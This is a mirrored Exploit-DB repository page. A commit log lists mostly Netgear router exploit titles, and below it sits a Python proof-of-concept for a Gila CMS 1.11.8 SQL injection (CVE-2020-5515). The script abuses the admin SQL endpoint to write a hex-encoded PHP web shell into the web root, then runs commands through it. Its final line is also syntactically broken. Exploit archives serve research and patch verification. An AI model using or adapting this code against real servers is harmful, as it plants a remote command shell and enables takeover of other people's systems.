bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48590.py
Offensive Security 8fc6092de1 DB: 2020-06-17 
4 changes to exploits/shellcodes

NETGEAR SSL312 Router - Denial of Service
Netgear SSL312 Router - Denial of Service

NETGEAR WGR614v9 Wireless Router - Denial of Service
Netgear WGR614v9 Wireless Router - Denial of Service

NETGEAR DG632 Router - Remote Denial of Service
Netgear DG632 Router - Remote Denial of Service

NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service
Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service

NETGEAR ProSafe - Denial of Service
Netgear ProSafe - Denial of Service

NETGEAR WGR614 - Administration Interface Remote Denial of Service
Netgear WGR614 - Administration Interface Remote Denial of Service

NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation
Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation

Outline Service 1.3.3  - 'Outline Service ' Unquoted Service Path
Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path

Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path

NETGEAR WG102 - Leaks SNMP Write Password With Read Access
Netgear WG102 - Leaks SNMP Write Password With Read Access

NETGEAR DG632 Router - Authentication Bypass
Netgear DG632 Router - Authentication Bypass

NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure
Netgear WNR2000 FW 1.2.0.8 - Information Disclosure

NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)
Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)

NETGEAR FM114P Wireless Firewall - File Disclosure
Netgear FM114P Wireless Firewall - File Disclosure

NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure
Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure

NETGEAR FM114P ProSafe Wireless Router - Rule Bypass
Netgear FM114P ProSafe Wireless Router - Rule Bypass

NETGEAR RP114 3.26 - Content Filter Bypass
Netgear RP114 3.26 - Content Filter Bypass

NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)
Netgear DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)

NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)
Netgear DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)

NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow
Netgear MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow

NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow
Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow

NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)
Netgear ReadyNAS - Perl Code Evaluation (Metasploit)

NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting
Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting

NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities
Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities

NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities
Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities

NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution
Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution

NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)
Netgear NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)
NETGEAR JNR1010 ADSL Router - (Authenticated) Remote File Disclosure
NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure
Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure
Netgear WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure

NETGEAR WNR2000v5 - Remote Code Execution
Netgear WNR2000v5 - Remote Code Execution

NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)
Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)

NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)
Netgear WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)

NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)
Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)

NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)
Netgear - 'TelnetEnable' Magic Packet (Metasploit)

WordPress MU < 1.3.2 - active_plugins option Code Execution
WordPress MU < 1.3.2 - 'active_plugins' Code Execution

NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery
Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery

NETGEAR SPH200D - Multiple Vulnerabilities
Netgear SPH200D - Multiple Vulnerabilities

NETGEAR DGN1000B - Multiple Vulnerabilities
Netgear DGN1000B - Multiple Vulnerabilities

NETGEAR DGN2200B - Multiple Vulnerabilities
Netgear DGN2200B - Multiple Vulnerabilities

NETGEAR WNR1000 - Authentication Bypass
Netgear WNR1000 - Authentication Bypass

NETGEAR WPN824v3 - Unauthorized Configuration Download
Netgear WPN824v3 - Unauthorized Configuration Download

NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities
Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities

NETGEAR ProSafe - Information Disclosure
Netgear ProSafe - Information Disclosure

NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)
Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)

NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities
Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities

NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities
Netgear WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting
Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure
Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure

NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access
Netgear WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access

NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure
Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure

NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation
Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation

NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities
Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities

NETGEAR WNR1000v4 - Authentication Bypass
Netgear WNR1000v4 - Authentication Bypass

NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities
Netgear NMS300 ProSafe Network Management System - Multiple Vulnerabilities
NETGEAR R7000 - Command Injection
NETGEAR R7000 - Cross-Site Scripting
Netgear R7000 - Command Injection
Netgear R7000 - Cross-Site Scripting

NETGEAR Routers - Password Disclosure
Netgear Routers - Password Disclosure

NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution
Netgear DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution

NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution
Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution

NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery
Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery

Multiple  WordPress Plugins - Arbitrary File Upload
Multiple WordPress Plugins - Arbitrary File Upload

NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution
Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution

NETGEAR WiFi Router R6120 - Credential Disclosure
Netgear WiFi Router R6120 - Credential Disclosure

NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass
Netgear WiFi Router JWNR2010v5 / R6080 - Authentication Bypass

WordPress Plugin LearnDash  LMS 3.1.2 - Reflective Cross-Site Scripting
WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting

School File Management System 1.0  - 'username' SQL Injection
School File Management System 1.0 - 'username' SQL Injection

ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection
WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection

Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection

Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)

Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation
WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation

Joomla J2  Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)
Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)
Netgear R7000 Router - Remote Code Execution
Gila CMS 1.11.8 - 'query' SQL Injection
2020-06-17 05:02:00 +00:00

47 lines
No EOL
1.5 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Gila CMS 1.11.8 - 'query' SQL Injection
# Date: 2020-06-15
# Exploit Author: Carlos Ramírez L. (BillyV4)
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/1.11.8
# Version: Gila 1.11.8
# Tested on: Gila 1.11.8
# CVE : CVE-2020-5515
import requests as req
import time as vremeto
import sys as sistemot
import re as regularno
if len(sistemot.argv) < 2:
print("Usage: ./CVE_2020_5515.py ip:port")
sistemot.exit(19)
else:
ip = sistemot.argv[1]
cookies = {'PHPSESSID': 'r2k5bp52edr9ls36d35iohdlng', 'GSESSIONID': '21k2mbxockr9sf1v1agxkwpkt6ruzdl6vjz6fgmt7s0e72hlas'}
webpath = "/gila-1.11.8/admin/sql?query="
query1 = "SELECT id FROM user LIMIT 0,1 INTO OUTFILE "
localpath = "\'C://xampp//htdocs//"
shellname = "webshell.php\' "
query2 = "LINES TERMINATED BY "
print("[*] Injecting ")
cmdphp = "0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297"
cmdphp += "b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d"
cmdphp += "2824636d64293b206563686f20273c2f7072653e24636d643c7072653e273b2064696"
cmdphp += "53b207d203f3e"
url = 'http://' + ip + webpath + query1 + localpath + shellname + query2 + cmdphp
r = req.get(url, cookies=cookies)
vremeto.sleep(1)
print("[*] Executing")
r = req.get("http://" + ip + "/" + shellname + "?cmd=whoami")
print("You have a webshell in http://" + ip + "/" + shellname "?cmd=command")
Reference in a new issue View git blame Copy permalink